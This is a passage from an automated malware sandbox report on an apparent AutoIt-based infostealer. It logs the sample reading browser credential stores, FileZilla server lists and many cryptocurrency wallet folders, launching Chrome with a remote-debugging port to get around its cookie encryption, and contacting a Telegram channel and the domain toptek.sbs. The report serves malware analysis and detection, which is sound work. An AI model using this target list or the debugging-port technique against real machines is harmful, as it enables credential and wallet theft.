                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Dry.comBinary or memory string: WIN_81
                Source: Dry.comBinary or memory string: WIN_XP
                Source: Volunteer.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Dry.comBinary or memory string: WIN_XPe
                Source: Dry.comBinary or memory string: WIN_VISTA
                Source: Dry.comBinary or memory string: WIN_7
                Source: Dry.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Dry.com PID: 7548, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 10.2.Dry.com.3f90000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Dry.com PID: 7548, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B62263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00B62263
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B61C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00B61C61
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol4
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Extra Window Memory Injection
                2
                Obfuscated Files or Information
                Security Account Manager3
                File and Directory Discovery
                SMB/Windows Admin Shares21
                Input Capture
                1
                Remote Access Software
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                1
                DLL Side-Loading
                NTDS27
                System Information Discovery
                Distributed Component Object Model3
                Clipboard Data
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                Extra Window Memory Injection
                LSA Secrets221
                Security Software Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                Process Injection
                111
                Masquerading
                Cached Domain Credentials11
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579617 Sample: 9EI7wrGs4K.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 46 toptek.sbs 2->46 48 t.me 2->48 50 bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO 2->50 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 5 other signatures 2->72 10 9EI7wrGs4K.exe 29 2->10         started        signatures3 process4 process5 12 cmd.exe 2 10->12         started        file6 38 C:\Users\user\AppData\Local\Temp\...\Dry.com, PE32 12->38 dropped 74 Drops PE files with a suspicious file extension 12->74 16 Dry.com 28 12->16         started        20 cmd.exe 2 12->20         started        22 conhost.exe 12->22         started        24 7 other processes 12->24 signatures7 process8 dnsIp9 40 t.me 149.154.167.99, 443, 49741 TELEGRAMRU United Kingdom 16->40 42 toptek.sbs 94.130.188.57, 443, 49742, 49743 HETZNER-ASDE Germany 16->42 44 127.0.0.1 unknown unknown 16->44 58 Attempt to bypass Chrome Application-Bound Encryption 16->58 60 Found many strings related to Crypto-Wallets (likely being stolen) 16->60 62 Found API chain indicative of sandbox detection 16->62 64 4 other signatures 16->64 26 chrome.exe 16->26         started        29 cmd.exe 1 16->29         started        signatures10 process11 dnsIp12 52 192.168.2.4, 138, 443, 49572 unknown unknown 26->52 54 239.255.255.250 unknown Reserved 26->54 31 chrome.exe 26->31         started        34 conhost.exe 29->34         started        36 timeout.exe 1 29->36         started        process13 dnsIp14 56 www.google.com 142.250.181.132, 443, 49754, 49755 GOOGLEUS United States 31->56

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                9EI7wrGs4K.exe21%ReversingLabs
                9EI7wrGs4K.exe18%VirustotalBrowse
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\245347\Dry.com0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                toptek.sbs
                94.130.188.57
                truefalse
                  high
                  t.me
                  149.154.167.99
                  truefalse
                    high
                    www.google.com
                    142.250.181.132
                    truefalse
                      high
                      bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO
                      unknown
                      unknownfalse
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabDry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, EKXT2N.10.drfalse
                          high
                          https://google-ohttp-relay-join.fastly-edge.com/(chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drfalse
                              high
                              https://google-ohttp-relay-join.fastly-edge.com/2chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://anglebug.com/4633chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://google-ohttp-relay-join.fastly-edge.com/5chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://anglebug.com/7382chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drfalse
                                        high
                                        https://google-ohttp-relay-join.fastly-edge.com/;chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://issuetracker.google.com/284462263chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://google-ohttp-relay-join.fastly-edge.com/9chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl09EI7wrGs4K.exefalse
                                                high
                                                http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_9EI7wrGs4K.exefalse
                                                  high
                                                  https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://polymer.github.io/AUTHORS.txtchrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037713026.0000335C0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044701167.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044657483.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2038321277.0000335C01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037533554.0000335C00EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044625142.0000335C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044790316.0000335C00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037761626.0000335C00F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037675980.0000335C0101C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://docs.google.com/chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://anglebug.com/7714chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://google-ohttp-relay-join.fastly-edge.com/Rchrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.google.com/chrome/tips/chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://anglebug.com/6248chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://anglebug.com/6929chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://anglebug.com/5281chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://toptek.sbsesDry.com, 0000000A.00000002.2461862261.000000000413C000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drfalse
                                                                              high
                                                                              https://issuetracker.google.com/255411748chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://anglebug.com/7246chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://anglebug.com/7369chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://anglebug.com/7489chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/?q=chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://chrome.google.com/webstorechrome.exe, 0000000F.00000003.2036290539.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://drive-daily-2.corp.google.com/chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://polymer.github.io/PATENTS.txtchrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037713026.0000335C0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044701167.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044657483.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2038321277.0000335C01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037533554.0000335C00EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044625142.0000335C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2044790316.0000335C00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037761626.0000335C00F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037675980.0000335C0101C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/previewchrome.exe, 0000000F.00000003.2074915631.0000335C02A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drfalse
                                                                                                  high
                                                                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaDry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drfalse
                                                                                                    high
                                                                                                    https://t.me/k04aelm0nk3Mozilla/5.0Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.autoitscript.com/autoit3/XDry.com, 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp, Dry.com.1.dr, Volunteer.0.drfalse
